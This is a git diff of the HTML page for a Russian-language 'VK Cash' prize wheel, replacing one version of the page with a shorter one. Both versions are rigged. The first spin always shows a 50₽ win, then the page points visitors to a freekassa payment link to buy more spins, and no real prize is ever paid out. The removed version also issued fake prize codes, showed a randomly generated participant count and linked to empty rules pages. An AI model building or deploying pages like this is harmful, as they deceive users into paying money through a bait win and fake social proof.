--- a/index.html
+++ b/index.html
@@ -1,149 +1,76 @@
+
 <!DOCTYPE html>
 <html lang="ru">
 <head>
-  <meta charset="UTF-8" />
-  <title>VK Cash Roulette</title>
-  <style>
-    body {
-      font-family: sans-serif;
-      background: #0e0e0e;
-      color: white;
-      text-align: center;
-      padding: 30px;
-    }
-
-    #wheel {
-      width: 300px;
-      height: 300px;
-      border: 10px solid #fff;
-      border-radius: 50%;
-      margin: 20px auto;
-      position: relative;
-      background: conic-gradient(#2ecc71 0% 20%, #e74c3c 20% 40%, #3498db 40% 60%, #f1c40f 60% 80%, #9b59b6 80% 100%);
-      transition: transform 4s ease-out;
-    }
-
-    #spin {
-      padding: 10px 20px;
-      font-size: 18px;
-      background: #3498db;
-      color: white;
-      border: none;
-      border-radius: 5px;
-      cursor: pointer;
-      margin-top: 15px;
-    }
-
-    #result {
-      font-size: 20px;
-      margin-top: 20px;
-    }
-
-    .top-bar {
-      font-size: 14px;
-      margin-top: 50px;
-      color: #aaa;
-    }
-
-    .code-block {
-      margin-top: 10px;
-      font-family: monospace;
-      background: #1f1f1f;
-      padding: 10px;
-      border-radius: 5px;
-    }
-
-    #payBtn {
-      display: none;
-      margin-top: 15px;
-      background-color: #2ecc71;
-      color: white;
-      padding: 12px 24px;
-      border: none;
-      border-radius: 5px;
-      font-size: 16px;
-      cursor: pointer;
-    }
-
-    #firstSpinNotice {
-      font-size: 14px;
-      color: #ccc;
-      margin-top: 10px;
-    }
-  </style>
+    <meta charset="UTF-8">
+    <title>VK Cash Wheel</title>
+    <style>
+        body {
+            font-family: Arial, sans-serif;
+            text-align: center;
+            background: #111;
+            color: #fff;
+        }
+        #wheel {
+            margin: 20px auto;
+            width: 300px;
+            height: 300px;
+            border-radius: 50%;
+            border: 10px solid #fff;
+            position: relative;
+            background: conic-gradient(
+                #4caf50 0% 25%,
+                #f44336 25% 50%,
+                #2196f3 50% 75%,
+                #ffeb3b 75% 100%
+            );
+            animation: spin 0.5s ease-out;
+        }
+        #result {
+            font-size: 24px;
+            margin-top: 20px;
+        }
+        button {
+            background: #4caf50;
+            color: white;
+            padding: 10px 20px;
+            font-size: 18px;
+            border: none;
+            border-radius: 5px;
+            cursor: pointer;
+        }
+    </style>
 </head>
 <body>
-  <h1>🎰 Рулетка VK Cash</h1>
-  <div id="wheel"></div>
-  <button id="spin">Крутить колесо</button>
-  <div id="result"></div>
-  <div id="firstSpinNotice">* Первая попытка всегда выигрывает</div>
-  <button id="payBtn">Попробовать ещё за 50₽</button>
-
-  <div class="top-bar">
-    <p>📜 <a href="#">Правила участия</a> • <a href="#">FAQ</a> • <a href="#">Политика</a></p>
-    <p>👑 Топ победители обновляются каждые 5 минут</p>
-    <p>🔁 Участников: <span id="playersCount"></span></p>
-  </div>
-
-  <script>
-    const wheel = document.getElementById("wheel");
-    const result = document.getElementById("result");
-    const spinBtn = document.getElementById("spin");
-    const payBtn = document.getElementById("payBtn");
-    let hasSpun = false;
-
-    function generateCode(amount) {
-      const timestamp = Date.now();
-      const random = Math.random().toString(36).substring(2, 6).toUpperCase();
-      return `CODE-${amount}-${timestamp}-${random}`;
-    }
-
-    function spinWheel() {
-      let deg = Math.floor(3600 + Math.random() * 1000);
-      wheel.style.transform = `rotate(${deg}deg)`;
-
-      setTimeout(() => {
-        let win = false;
-        let amount = 0;
-
-        if (!hasSpun) {
-          win = true;
-          amount = 50;
-        } else {
-          const chance = Math.random();
-          if (chance < 0.25) {
-            win = true;
-            amount = [50, 100, 200, 300][Math.floor(Math.random() * 4)];
-          }
+    <h1>🎰 VK Cash Wheel</h1>
+    <div id="wheel"></div>
+    <button onclick="spin()">Крутить</button>
+    <div id="result"></div>
+    <div id="payment" style="margin-top:20px;"></div>
+    <script>
+        let firstSpin = true;
+        function spin() {
+            const result = document.getElementById("result");
+            const wheel = document.getElementById("wheel");
+            const payment = document.getElementById("payment");
+            wheel.style.transform = "rotate(" + (Math.random() * 1000 + 500) + "deg)";
+            setTimeout(() => {
+                if (firstSpin) {
+                    firstSpin = false;
+                    result.innerText = "Вы выиграли 50₽!";
+                    payment.innerHTML = '<a href="https://pay.freekassa.ru/?m=F7202575639398546&oa=50&currency=RUB&us_desc=Второй+спин">💸 Оплатить второй спин</a>';
+                } else {
+                    const r = Math.random();
+                    if (r < 0.2) {
+                        const prizes = [100, 150, 200];
+                        const win = prizes[Math.floor(Math.random() * prizes.length)];
+                        result.innerText = "Вы выиграли " + win + "₽!";
+                    } else {
+                        result.innerText = "Вы проиграли. Попробуйте ещё!";
+                    }
+                }
+            }, 1000);
         }
-
-        if (win) {
-          const code = generateCode(amount);
-          result.innerHTML = `🎉 Поздравляем! Вы выиграли <b>${amount}₽</b><br><div class="code-block">${code}</div>`;
-        } else {
-          result.innerText = "😢 Увы, вы ничего не выиграли";
-        }
-
-        hasSpun = true;
-        spinBtn.style.display = "none";
-        payBtn.style.display = "inline-block";
-      }, 4000);
-    }
-
-    spinBtn.onclick = spinWheel;
-
-    payBtn.onclick = () => {
-      window.location.href = "https://pay.freekassa.ru?m=F7202575639398546&oa=50&currency=RUB&us_site=vk-cash";
-    };
-
-    function updatePlayersCount() {
-      const count = Math.floor(100 + Math.random() * 50);
-      document.getElementById("playersCount").innerText = count;
-    }
-
-    setInterval(updatePlayersCount, 15000);
-    updatePlayersCount();
-  </script>
+    </script>
 </body>
 </html>
